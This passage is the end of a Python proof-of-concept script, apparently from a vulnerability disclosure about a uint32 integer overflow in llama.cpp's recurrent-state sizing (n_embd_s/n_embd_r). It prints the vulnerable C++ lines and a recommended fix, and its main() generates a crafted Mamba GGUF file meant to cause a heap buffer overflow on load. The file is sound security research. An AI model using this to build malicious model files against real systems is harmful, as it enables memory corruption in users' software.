    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    correct_n_embd_r = 2 * n_embd  # token_shift_count defaults to 2
    overflowed_n_embd_r = uint32_overflow(correct_n_embd_r)

    print(f"\n{'='*78}")
    print("RWKV6 OVERFLOW ANALYSIS")
    print(f"{'='*78}")
    print(f" n_embd: {n_embd}")
    print(f" wkv_head_size: {wkv_head_size}")
    print(f" n_embd_s() correct: {correct_n_embd_s} ({correct_n_embd_s * 4 / (1024**3):.1f} GiB as f32)")
    print(f" n_embd_s() overflowed: {overflowed_n_embd_s} ({overflowed_n_embd_s * 4 / (1024**2):.1f} MiB as f32)")
    print(f" Buffer undersized by: {correct_n_embd_s / overflowed_n_embd_s:.0f}x")
    print(f" n_embd_r() correct: {correct_n_embd_r} (no overflow)")
    print()

    # For RWKV6, key tensors and their sizes:
    print(" Key tensor sizes (showing why full PoC file is large):")
    print(f" token_embd {{n_embd, n_vocab}} = {{{n_embd}, {n_vocab}}} = {n_embd*n_vocab*4/(1024**2):.1f} MiB")
    print(f" time_mix_key {{n_embd, n_embd}} = {{{n_embd}, {n_embd}}} = {n_embd*n_embd*4/(1024**3):.1f} GiB")
    print(f" time_mix_first {{head_sz, n_embd/hs}} = {{{wkv_head_size}, {n_embd//wkv_head_size}}} = {wkv_head_size*(n_embd//wkv_head_size)*4/1024:.1f} KiB")
    print()

    # We don't actually create this file since the tensors would be huge.
    # The Mamba PoC above demonstrates the GGUF structure.
    print(" (RWKV6 GGUF file not generated -- tensor data would be ~16GB)")
    print(" The vulnerability is the same code path as Mamba, just different parameters.")
|
| 467 |
+
|
| 468 |
+
|
| 469 |
+
def print_vulnerable_code():
    """Print the exact vulnerable code for reference.

    Output-only helper: the triple-quoted block below is display text quoting
    llama.cpp sources (line numbers refer to the upstream tree under review).
    """
    print(f"\n{'='*78}")
    print("VULNERABLE CODE REFERENCES")
    print(f"{'='*78}")
    print("""
FILE: src/llama-hparams.cpp

Line 131-134 (n_embd_r for RWKV):
uint32_t llama_hparams::n_embd_r() const {
if (wkv_head_size != 0) {
return token_shift_count * n_embd; // OVERFLOW: uint32 * uint32
}

Line 137-139 (n_embd_r for LFM2):
if (n_shortconv_l_cache != 0) {
return n_embd * (n_shortconv_l_cache - 1); // OVERFLOW: uint32 * uint32
}

Line 152 (n_embd_r for Mamba):
return (ssm_d_conv > 0 ? ssm_d_conv - 1 : 0)
* (ssm_d_inner + 2*ssm_n_group*ssm_d_state); // OVERFLOW: multiple uint32 ops

Line 155-158 (n_embd_s for RWKV):
uint32_t llama_hparams::n_embd_s() const {
if (wkv_head_size != 0) {
return n_embd * wkv_head_size; // OVERFLOW: uint32 * uint32
}

Line 161-165 (n_embd_s for Kimi KDA):
if (n_embd_head_kda != 0) {
return n_embd_head_kda * n_embd_head_kda * n_head(); // OVERFLOW: triple uint32

Line 169 (n_embd_s for Mamba):
return ssm_d_state * ssm_d_inner; // OVERFLOW: uint32 * uint32

FILE: src/llama-memory-recurrent.cpp

Line 94-95 (allocation with overflowed size):
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
// DOUBLE OVERFLOW: n_embd_r()/n_embd_s() returns uint32_t,
// multiplication with mem_size (uint32_t) can overflow AGAIN
// before widening to int64_t parameter of ggml_new_tensor_1d

FILE: src/llama-hparams.h

All overflow-prone fields are uint32_t (no validation, no range checks):
Line 44: uint32_t n_embd;
Line 62: uint32_t n_shortconv_l_cache = 0;
Line 99: uint32_t wkv_head_size = 0;
Line 100: uint32_t token_shift_count = 2;
Line 133: uint32_t ssm_d_conv = 0;
Line 134: uint32_t ssm_d_inner = 0;
Line 135: uint32_t ssm_d_state = 0;
Line 137: uint32_t ssm_n_group = 0;
Line 140: uint32_t n_embd_head_kda = 0;
""")
|
| 527 |
+
|
| 528 |
+
|
| 529 |
+
def print_fix_recommendation():
    """Print recommended fix.

    Output-only helper: the block below is display text sketching the C++
    remediation (widen to uint64_t, cast before multiply, validate hparams).
    """
    print(f"\n{'='*78}")
    print("RECOMMENDED FIX")
    print(f"{'='*78}")
    print("""
The fix should address both the return type and the arithmetic:

1. Change n_embd_r() and n_embd_s() return types from uint32_t to uint64_t:

uint64_t llama_hparams::n_embd_r() const {
if (wkv_head_size != 0) {
return (uint64_t)token_shift_count * n_embd;
}
...

uint64_t llama_hparams::n_embd_s() const {
if (wkv_head_size != 0) {
return (uint64_t)n_embd * wkv_head_size;
}
...

2. Fix the allocation site in llama-memory-recurrent.cpp:

// Cast to int64_t before multiplying with mem_size
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, (int64_t)hparams.n_embd_r() * mem_size);
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, (int64_t)hparams.n_embd_s() * mem_size);

3. Add validation of hparams values after loading from GGUF:

// Validate that products won't cause unreasonable allocations
uint64_t embd_s = (uint64_t)ssm_d_state * ssm_d_inner;
if (embd_s > INT32_MAX) {
throw std::runtime_error("ssm state size overflow");
}
""")
|
| 565 |
+
|
| 566 |
+
|
| 567 |
+
def main():
    """Run the full PoC: overflow analysis, GGUF generation, and summary."""
    print("=" * 78)
    print("PoC: uint32_t Integer Overflow in llama_hparams::n_embd_s() / n_embd_r()")
    print("Target: llama.cpp GGUF model loading (recurrent state buffer allocation)")
    print("=" * 78)

    # Analyze all overflow scenarios
    analyze_overflow_scenarios()

    # Print vulnerable code references
    print_vulnerable_code()

    # Generate Mamba PoC GGUF (written next to this script)
    poc_dir = os.path.dirname(os.path.abspath(__file__))
    mamba_poc_path = os.path.join(poc_dir, "poc_mamba_overflow.gguf")
    generate_mamba_poc_gguf(mamba_poc_path)

    # Analyze RWKV6 overflow
    # (None is fine: generate_rwkv6_poc_gguf only prints, it writes no file)
    generate_rwkv6_poc_gguf(None)

    # Print fix recommendation
    print_fix_recommendation()

    print(f"\n{'='*78}")
    print("SUMMARY")
    print(f"{'='*78}")
    print("""
VULNERABILITY: Integer overflow in n_embd_s()/n_embd_r() (uint32_t arithmetic)

IMPACT: Heap buffer overflow via undersized recurrent state allocation.
- Attacker crafts GGUF with metadata values whose product exceeds 2^32
- n_embd_s()/n_embd_r() silently wraps to a small value
- Small buffer is allocated for recurrent state
- During inference, full-sized state data is written to undersized buffer
- Results in heap-buffer-overflow (detectable by ASan)

SEVERITY: High
- Triggered by loading a malicious GGUF file (no special flags needed)
- Affects all recurrent architectures: Mamba, Mamba2, RWKV6, RWKV7, LFM2, Kimi
- No input validation on the overflow-prone metadata fields
- Overflow is in model loading path, not just inference

ROOT CAUSE: uint32_t return type and arithmetic in n_embd_s()/n_embd_r()
combined with lack of validation on GGUF metadata values.

AFFECTED CODE:
- src/llama-hparams.cpp: lines 134, 139, 146, 152, 158, 165, 169
- src/llama-memory-recurrent.cpp: lines 94-95
- src/llama-hparams.h: uint32_t field declarations (no range checks)
""")
|
| 617 |
+
|
| 618 |
+
|
| 619 |
+
# Script entry point: run the full PoC when executed directly.
if __name__ == "__main__":
    main()
|